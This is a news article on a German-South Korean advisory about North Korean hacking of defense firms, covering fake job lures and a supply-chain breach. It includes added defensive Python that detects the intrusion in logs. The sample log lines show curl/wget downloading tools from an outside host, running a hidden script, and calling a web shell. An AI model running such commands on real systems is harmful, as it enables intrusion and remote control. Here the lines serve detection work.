New report reveals North Korean hackers are targeting defense companies worldwide


North Korean state-sponsored threat actors have been attributed to a cyber espionage campaign targeting the defense sector around the world.

In a joint advisory published by Germany’s Federal Office for the Protection of the Constitution (BfV) and South Korea’s National Intelligence Service (NIS), the agencies said the aim of the attacks is to obtain advanced defense technologies in a “cost-effective” manner.

“The regime is using military technologies to modernize and improve the performance of conventional weapons and to develop new strategic weapon systems, including ballistic missiles, reconnaissance satellites and submarines,” the agencies noted.

The Lazarus Group has been blamed for one of the two incidents, in which social engineering was used to infiltrate the defense sector as part of a long-running operation known as Dream Job. The campaign has been active since August 2020 and has consisted of several waves.

In these attacks, the threat actors create fake profiles, or use legitimate but compromised ones, on platforms such as LinkedIn to approach potential targets and build trust with them. They then offer lucrative job opportunities and move the conversation to another messaging service, such as WhatsApp, to begin the “recruitment” process.

Victims are then sent coding assignments and job offer documents laced with malware that, when opened, triggers the infection chain and compromises their computers.

“In general, the fact that employees typically do not discuss job openings with their coworkers or employer plays into the hands of the attacker,” the agencies said.

“The LAZARUS group has changed its tools during the campaign and demonstrated more than once that it is capable of developing everything necessary to meet the situation.”

The second case involves the breach of a defense research center at the end of 2022 via a software supply chain attack on an unnamed company responsible for maintaining one of the research center’s web servers.

“The cyber actor further infiltrated the research facility by deploying remotely controlled malware through a patch management system (PMS) of the research center, and stole various account information from corporate portals and email content,” the BfV and NIS said.


The breach, which was carried out by another North Korea-based threat actor, occurred in five phases:

  • Compromise the web server maintenance company, steal SSH credentials and gain remote access to the research center’s server
  • Download additional malicious tools using curl commands, including tunneling software and a Python-based downloader
  • Move laterally and harvest employee account credentials
  • Use the stolen security manager’s account to attempt, unsuccessfully, to distribute a trojanized update capable of uploading and downloading files, executing code and collecting system information
  • Persist in the target environment by exploiting a file upload vulnerability on the website to deploy a web shell for remote access, and by sending spear-phishing emails
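Each of the five phases leaves traces in logs a defender already keeps: the server’s SSH auth log, a command audit trail, and the web server’s access log. The following Python is an added example written for this page, not code from the BfV/NIS advisory or from either agency; the account name, allowlists, endpoint paths and every log line are constructed assumptions (addresses are from the documentation ranges 203.0.113.0/24 and 198.51.100.0/24). It flags the vendor’s SSH account logging in from an unknown address, curl/wget fetches from a non-allowlisted host shortly after that login, and requests for a script under the upload directory once a POST to the upload handler has succeeded.

```python
"""Added example: detections keyed to the five-phase intrusion chain above.

Editor-written illustration code, not material from the advisory. Log lines,
host names, the vendor account name and all IP addresses are constructed for
the example; the allowlists are assumptions a defender replaces with their
own inventory.
"""
import re
from datetime import datetime, timedelta

VENDOR_ACCOUNT = "vendor-maint"                   # assumed: maintenance vendor's SSH account
VENDOR_KNOWN_IPS = {"203.0.113.7"}                # assumed: vendor's known egress address
DOWNLOAD_ALLOWLIST = {"mirror.example.internal"}  # assumed: only host curl/wget may pull from
UPLOAD_ENDPOINT = "/upload.php"                   # assumed: the site's file upload handler
UPLOAD_DIR = "/uploads/"                          # assumed: where uploaded files are served from
SCRIPT_EXT = re.compile(r"\.(php|phtml|jsp|aspx?)$", re.I)

# Constructed sample logs: sshd auth log, command audit trail, web access log.
AUTH_LOG = [
    "Feb 19 01:58:02 web01 sshd[1190]: Accepted publickey for vendor-maint from 203.0.113.7 port 50112 ssh2",
    "Feb 19 02:13:44 web01 sshd[1201]: Accepted publickey for vendor-maint from 198.51.100.23 port 51022 ssh2",
    "Feb 19 02:14:01 web01 sshd[1202]: Failed password for invalid user admin from 198.51.100.23 port 51030 ssh2",
]
AUDIT_LOG = [
    "Feb 19 02:00:30 web01 audit: user=vendor-maint cmd=curl -sO https://mirror.example.internal/patch-2024-02.tgz",
    "Feb 19 02:15:10 web01 audit: user=vendor-maint cmd=curl -sO http://198.51.100.23/tunnel.tar.gz",
    "Feb 19 02:16:42 web01 audit: user=vendor-maint cmd=wget -q http://198.51.100.23/dl.py -O /tmp/.d.py",
    "Feb 19 02:17:05 web01 audit: user=vendor-maint cmd=python3 /tmp/.d.py",
]
ACCESS_LOG = [
    '198.51.100.23 - - [19/Feb/2024:02:30:01 +0000] "GET /index.php HTTP/1.1" 200 3120',
    '198.51.100.23 - - [19/Feb/2024:02:30:44 +0000] "POST /upload.php HTTP/1.1" 200 64',
    '198.51.100.23 - - [19/Feb/2024:02:31:02 +0000] "GET /uploads/banner.png HTTP/1.1" 200 9001',
    '198.51.100.23 - - [19/Feb/2024:02:31:19 +0000] "GET /uploads/cache.php?c=id HTTP/1.1" 200 88',
]

SSH_RE = re.compile(r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Accepted \w+ for (?P<user>\S+) from (?P<ip>\S+)")
CMD_RE = re.compile(r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ audit: user=(?P<user>\S+) cmd=(?P<cmd>.+)$")
URL_RE = re.compile(r"https?://(?P<host>[^/\s:]+)")
WEB_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def parse_ts(syslog_ts, year=2024):
    """Syslog timestamps carry no year; the year is an assumption for the sample."""
    return datetime.strptime(f"{year} {' '.join(syslog_ts.split())}", "%Y %b %d %H:%M:%S")


def vendor_logins_from_unknown_ips(auth_lines):
    """Phase 1: the vendor's SSH account used from an address outside its known egress."""
    hits = []
    for m in filter(None, map(SSH_RE.match, auth_lines)):
        if m["user"] == VENDOR_ACCOUNT and m["ip"] not in VENDOR_KNOWN_IPS:
            hits.append({"rule": "vendor-ssh-unknown-ip", "ip": m["ip"], "ts": parse_ts(m["ts"])})
    return hits


def tool_fetches_after_login(auth_lines, audit_lines, window=timedelta(minutes=30)):
    """Phase 2: curl/wget from a non-allowlisted host within `window` of that user's SSH login."""
    logins = [(parse_ts(m["ts"]), m["user"]) for m in filter(None, map(SSH_RE.match, auth_lines))]
    hits = []
    for m in filter(None, map(CMD_RE.match, audit_lines)):
        cmd = m["cmd"]
        if cmd.split()[0] not in ("curl", "wget"):
            continue
        url = URL_RE.search(cmd)
        if url is None or url["host"] in DOWNLOAD_ALLOWLIST:
            continue
        ts = parse_ts(m["ts"])
        if any(user == m["user"] and timedelta(0) <= ts - login_ts <= window for login_ts, user in logins):
            hits.append({"rule": "post-login-tool-fetch", "user": m["user"], "host": url["host"], "cmd": cmd})
    return hits


def webshell_requests(access_lines):
    """Phase 5: after a successful POST to the upload handler, requests for a script under the upload dir."""
    upload_seen = False
    hits = []
    for m in filter(None, map(WEB_RE.match, access_lines)):
        path = m["path"].split("?", 1)[0]
        if m["method"] == "POST" and path == UPLOAD_ENDPOINT and m["status"] == "200":
            upload_seen = True
        elif upload_seen and path.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(path):
            hits.append({"rule": "webshell-request", "ip": m["ip"], "path": m["path"]})
    return hits


def run_all():
    """Run the three detections over the constructed samples and return every finding."""
    return (vendor_logins_from_unknown_ips(AUTH_LOG)
            + tool_fetches_after_login(AUTH_LOG, AUDIT_LOG)
            + webshell_requests(ACCESS_LOG))


if __name__ == "__main__":
    for finding in run_all():
        print(finding)
```

The point of correlating the fetch with a preceding login is that curl from a vendor account is routine during maintenance (the first audit line, pulling from the internal mirror, is deliberately not flagged); what is unusual is the same account fetching tooling from an arbitrary external host minutes after arriving from an address the vendor has never used. The web shell rule likewise ignores ordinary uploaded assets and only fires once a script extension is requested from the upload directory after an upload succeeded.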

“The actor avoided a direct attack on his target, which maintained a high level of security, but rather carried out an initial attack on his supplier, the maintenance and repair company,” the agencies explained. “This indicates that the actor abused the trust relationship between the two entities.”


The advisory is the second in as many years to be published jointly by BfV and NIS. In March 2023, the agencies warned about Kimsuky actors using rogue browser extensions to steal the contents of users’ Gmail inboxes. Kimsuky was sanctioned by the US government in November 2023.

The development comes as blockchain analytics firm Chainalysis revealed that the Lazarus Group has switched to the YoMix bitcoin mixer to launder stolen proceeds following the shutdown of Sinbad late last year, indicating that the group adjusts its modus operandi in response to law enforcement actions.

“Sinbad became a mixer of choice for North Korea-affiliated hackers in 2022, shortly after the sanctions against Tornado Cash, which was previously the go-to for these advanced cybercriminals,” the company said. “With Sinbad out of the picture, Bitcoin-based mixer YoMix has acted as a replacement.”

The malicious activities are the work of a plethora of North Korean hacking units operating under the broad Lazarus umbrella, which are known to engage in operations ranging from cyber espionage to cryptocurrency theft, ransomware and supply chain attacks in pursuit of the regime’s strategic goals.

